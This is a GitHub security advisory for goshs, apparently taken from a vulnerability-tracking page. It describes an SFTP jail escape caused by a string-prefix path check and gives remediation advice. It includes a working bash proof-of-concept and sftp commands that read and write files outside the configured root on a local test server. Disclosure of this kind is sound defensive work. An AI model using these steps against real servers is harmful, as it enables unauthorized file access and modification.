  "details": "### Summary\ngoshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files.\n\n### Details\nThe SFTP subsystem routes requests through `sftpserver/sftpserver.go:99-126` into `DefaultHandler.GetHandler()` in `sftpserver/handler.go:90-112`, which forwards file operations into `readFile`, `writeFile`, `listFile`, and `cmdFile`. All of those sinks rely on `sanitizePath()` in `sftpserver/helper.go:47-59`. The vulnerable logic is:\n\n```go\ncleanPath = filepath.Clean(\"/\" + clientPath)\nif !strings.HasPrefix(cleanPath, sftpRoot) {\n    return \"\", errors.New(\"access denied: outside of webroot\")\n}\n```\n\nThis is a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is `/tmp/goshsroot`, then a sibling path such as `/tmp/goshsroot_evil/secret.txt` incorrectly passes validation since it starts with the same byte prefix.\n\nThat unsafe value then reaches filesystem sinks including:\n\n- `os.Open` in `sftpserver/helper.go:80-94`\n- `os.Create` in `sftpserver/helper.go:139-152`\n- `os.Rename` in `sftpserver/helper.go:214-221`\n- `os.RemoveAll` in `sftpserver/helper.go:231-232`\n- `os.Mkdir` in `sftpserver/helper.go:242-243`\n\nThis means an authenticated SFTP user can escape the configured jail and read, create, upload, rename, or delete content outside the intended root directory.\n\n### PoC\nThe configured SFTP root was `/tmp/goshsroot`, but the SFTP client was still able to access `/tmp/goshsroot_evil/secret.txt` and create `/tmp/goshsroot_owned/pwned.txt`, both of which are outside the configured root.\n\nManual verification commands used:\n\n`Terminal 1`\n\n```bash\ncd \u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4\u0027\ngo build -o /tmp/goshs_beta4 ./\n\nrm -rf /tmp/goshsroot /tmp/goshsroot_evil /tmp/goshsroot_owned /tmp/outside_sftp.txt /tmp/local_upload.txt /tmp/goshs_beta4_client_key\nmkdir -p /tmp/goshsroot /tmp/goshsroot_evil\nprintf \u0027outside secret\\n\u0027 \u003e /tmp/goshsroot_evil/secret.txt\nprintf \u0027proof via sftp write\\n\u0027 \u003e /tmp/local_upload.txt\ncp sftpserver/goshs_client_key /tmp/goshs_beta4_client_key\nchmod 600 /tmp/goshs_beta4_client_key\n\n/tmp/goshs_beta4 -sftp -d /tmp/goshsroot --sftp-port 2222 \\\n  --sftp-keyfile sftpserver/authorized_keys \\\n  --sftp-host-keyfile sftpserver/goshs_host_key_rsa\n```\n\n`Terminal 2`\n\n```bash\nprintf \u0027ls /tmp/goshsroot_evil\\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\\nmkdir /tmp/goshsroot_owned\\nbye\\n\u0027 | \\\nsftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\nprintf \u0027put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\\nbye\\n\u0027 | \\\nsftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\ncat /tmp/outside_sftp.txt\ncat /tmp/goshsroot_owned/pwned.txt\n```\n\nExpected result:\n\n- `ls /tmp/goshsroot_evil` succeeds even though that path is outside `/tmp/goshsroot`\n- `cat /tmp/outside_sftp.txt` prints `outside secret`\n- `cat /tmp/goshsroot_owned/pwned.txt` prints `proof via sftp write`\n\nPoC Video 1:\n\nhttps://github.com/user-attachments/assets/d2c96301-afc8-4ddc-b008-74b235f94e31\n\n\n\nSingle-script verification:\n\n```bash\n\u0027/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc1\u0027\n```\n\n`gosh_poc1` script content:\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nREPO=\u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4\u0027\nBIN=\u0027/tmp/goshs_beta4_sftp_escape\u0027\nROOT=\u0027/tmp/goshsroot\u0027\nOUTSIDE=\u0027/tmp/goshsroot_evil\u0027\nOWNED=\u0027/tmp/goshsroot_owned\u0027\nCLIENT_KEY=\u0027/tmp/goshs_beta4_client_key\u0027\nDOWNLOAD=\u0027/tmp/outside_sftp.txt\u0027\nUPLOAD_SRC=\u0027/tmp/local_upload.txt\u0027\nPORT=\u00272222\u0027\nSERVER_PID=\"\"\n\ncleanup() {\n  if [[ -n \"${SERVER_PID:-}\" ]]; then\n    kill \"${SERVER_PID}\" \u003e/dev/null 2\u003e\u00261 || true\n    wait \"${SERVER_PID}\" 2\u003e/dev/null || true\n  fi\n}\ntrap cleanup EXIT\n\necho \u0027[1/6] Building goshs beta.4\u0027\ncd \"${REPO}\"\ngo build -o \"${BIN}\" ./\n\necho \u0027[2/6] Preparing root and sibling paths\u0027\nrm -rf \"${ROOT}\" \"${OUTSIDE}\" \"${OWNED}\" \"${DOWNLOAD}\" \"${UPLOAD_SRC}\" \"${CLIENT_KEY}\"\nmkdir -p \"${ROOT}\" \"${OUTSIDE}\"\nprintf \u0027outside secret\\n\u0027 \u003e \"${OUTSIDE}/secret.txt\"\nprintf \u0027proof via sftp write\\n\u0027 \u003e \"${UPLOAD_SRC}\"\ncp \"${REPO}/sftpserver/goshs_client_key\" \"${CLIENT_KEY}\"\nchmod 600 \"${CLIENT_KEY}\"\n\necho \u0027[3/6] Starting SFTP server\u0027\n\"${BIN}\" -sftp -d \"${ROOT}\" --sftp-port \"${PORT}\" \\\n  --sftp-keyfile \"${REPO}/sftpserver/authorized_keys\" \\\n  --sftp-host-keyfile \"${REPO}/sftpserver/goshs_host_key_rsa\" \\\n  \u003e/tmp/gosh_poc1.log 2\u003e\u00261 \u0026\nSERVER_PID=$!\n\nfor _ in $(seq 1 20); do\n  if python3 - \u003c\u003cPY\nimport socket\ns = socket.socket()\ntry:\n    s.connect((\"127.0.0.1\", ${PORT}))\n    raise SystemExit(0)\nexcept OSError:\n    raise SystemExit(1)\nfinally:\n    s.close()\nPY\n  then\n    break\n  fi\n  sleep 1\ndone\n\necho \u0027[4/6] Listing and downloading path outside configured root\u0027\nprintf \u0027ls /tmp/goshsroot_evil\\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\\nmkdir /tmp/goshsroot_owned\\nbye\\n\u0027 | \\\n  sftp -i \"${CLIENT_KEY}\" -P \"${PORT}\" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\necho \u0027[5/6] Writing a new file outside configured root\u0027\nprintf \u0027put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\\nbye\\n\u0027 | \\\n  sftp -i \"${CLIENT_KEY}\" -P \"${PORT}\" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\necho \u0027[6/6] Verifying outside-root read and write\u0027\necho \"Downloaded content: $(cat \"${DOWNLOAD}\")\"\necho \"Written content: $(cat \"${OWNED}/pwned.txt\")\"\n\nif [[ \"$(cat \"${DOWNLOAD}\")\" == \u0027outside secret\u0027 ]] \u0026\u0026 [[ \"$(cat \"${OWNED}/pwned.txt\")\" == \u0027proof via sftp write\u0027 ]]; then\n  echo \u0027[RESULT] VULNERABLE: authenticated SFTP user escaped the configured root\u0027\nelse\n  echo \u0027[RESULT] NOT REPRODUCED\u0027\n  exit 1\nfi\n```\n\nPoC Video 2:\n\nhttps://github.com/user-attachments/assets/25e7a4d7-6ec7-40a6-b3d4-d66df3ea3e5f\n\n\n\n### Impact\nThis is a path traversal / jail escape in the SFTP service. Any authenticated SFTP user can break out of the configured root and access sibling filesystem paths that were never meant to be exposed through goshs. In practice this can lead to unauthorized file disclosure, arbitrary file upload outside the shared root, unwanted directory creation, overwrite of sensitive files, or data deletion depending on the reachable path and server permissions.\n\n### Remediation\nSuggested fixes:\n\n1. Replace the raw prefix check with a real directory-boundary validation such as requiring either exact root equality or `root + path separator` as the prefix.\n2. Reuse the hardened HTTP-style path sanitizer across SFTP as well, so all file-serving modes share the same boundary logic.\n3. Add regression tests for sibling-prefix cases like `/tmp/goshsroot_evil`, not only `..` traversal payloads.",
  "id": "GHSA-5h6h-7rc9-3824",
  "modified": "2026-04-15T21:14:50Z",
  "published": "2026-04-14T22:28:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SFTP root escape via prefix-based path validation in goshs"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40876 (GCVE-0-2026-40876)

FKIE_CVE-2026-40876

GHSA-5H6H-7RC9-3824

Summary

Details

PoC

Impact

Remediation

Tags

Sightings

Nomenclature